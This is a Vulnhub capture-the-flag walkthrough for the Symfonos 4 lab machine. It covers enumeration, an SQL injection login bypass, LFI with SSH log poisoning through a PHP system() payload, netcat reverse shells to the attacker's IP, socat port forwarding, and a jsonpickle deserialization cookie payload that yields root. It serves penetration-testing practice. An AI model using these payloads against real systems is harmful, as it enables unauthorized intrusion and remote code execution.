Symfonos 4

Symfonos 4 Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV oA nmap/sym4 192.168.1.136
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 23:43 EDT
Nmap scan report for 192.168.1.136
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)
|   256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)
|_  256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:DA:3F:AA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.27 seconds

As usual port 80 is open and we can put our IP at the web browser

Let's put to dirb

Dirb

dirb http://192.168.1.136
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 27 00:05:13 2020
URL_BASE: http://192.168.1.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.136/ ----
==> DIRECTORY: http://192.168.1.136/css/                                                                                                                                                          
+ http://192.168.1.136/index.html (CODE:200|SIZE:201)                                                                                                                                             
==> DIRECTORY: http://192.168.1.136/javascript/                                                                                                                                                   
==> DIRECTORY: http://192.168.1.136/js/                                                                                                                                                           
==> DIRECTORY: http://192.168.1.136/manual/                                                                                                                                                       
+ http://192.168.1.136/robots.txt (CODE:403|SIZE:298)                                                                                                                                             
+ http://192.168.1.136/server-status (CODE:403|SIZE:301)

We can see there is a /robots.txt

We don't have permission to access this file, so I use nikto to enumerate

Nikto

nikto -h http://192.168.1.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.136
+ Target Hostname:    192.168.1.136
+ Target Port:        80
+ Start Time:         2020-05-27 00:17:10 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/atlantis.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: c9, size: 59058b74c9871, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-05-27 00:18:10 (GMT-4) (60 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We can see that there is /atlantis.php inside the robots.txt

Saw a login form, all I can think of is SQL injection.

After some tries, I can bypass the login form using this command at the username form

admin' or '1'='1'#

I can't seem to find anything. I even tried the LFI to ../../../../../../etc/passwd but does not work. So I went to more enumeration.

Gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.1.136 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.136
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/27 00:36:55 Starting gobuster
===============================================================
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/sea.php (Status: 302)
/atlantis.php (Status: 200)
/server-status (Status: 403)
/gods (Status: 301)
===============================================================
2020/05/27 00:41:53 Finished
===============================================================

Ah, we can see that there is a /gods

This is where the log file is stored. But then I realize this is the log file, then it seems like we can do ../../../../../../var/log/auth.

But if we do in the proper way, things will be like this

Exploitation

Wfuzz

We will use Wfuzz.

First, we need to use burp to intercept to get the PHPSESSID

Then, I use 

wfuzz -c -b 'PHPSESSID=6mlbncfhcq8vhshrb4iqc5ev1r' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://192.168.1.106/sea.php?file=FUZZ

But first I didn't get the thing I wanted, soon, I check the wordlists and surprisingly the file does not include ../../../../../../../var/log/auth.

So I add in myself, then we can run the command again

We need to hide the word that have the length of 39

wfuzz -c -b 'PHPSESSID=6mlbncfhcq8vhshrb4iqc5ev1r' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hw 39 http://192.168.1.106/sea.php?file=FUZZ

Run it again then we got this

We can see the log file now, then we can actually poison the LFI

ssh '<? php system($_GET['cmd']) ?>'@192.168.1.106

Then we can go to end of the URL and add &c=id;whoami;

We can now get the reverse shell from it

Our machine

nc -nlvp 4444

At the end of the URL

c=nc -e /bin/bash 192.168.1.116 4444

We got a shell !

Then we can type

python -c 'import pty; pty.spawn("/bin/bash")'

After some digging we can use 

ss -l

to get what port is running on the machine

As we can see there is another port that is running.

Port Forward

We can port forward the port to get access it, since this only can locally port forward so we need to use socat.

socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.0.1:8080 &

Then we can access it with port 8888

Then click the Main page

Since it mentioned about cookie, let's check for cookie

We can decode the password with this website and we got this

After some researching, it is a jsonpickle exploit. We can read these 3 website

to get an idea how it works

The code looks like this

{"py/reduce": "__main__.Shell", "py/reduce": [{"py/function": "os.system"},["nc -e /bin/bash 192.168.1.116 9000"],0,0,0]}

Then we can encode using base64 and put it at the cookies and get a reverse shell

Remember to set up a listener at our machine first

And then refresh the page, we got root !

Navigate to /root and get the flag.txt

Congratulation!

PreviousSymfonos 3NextDC

Last updated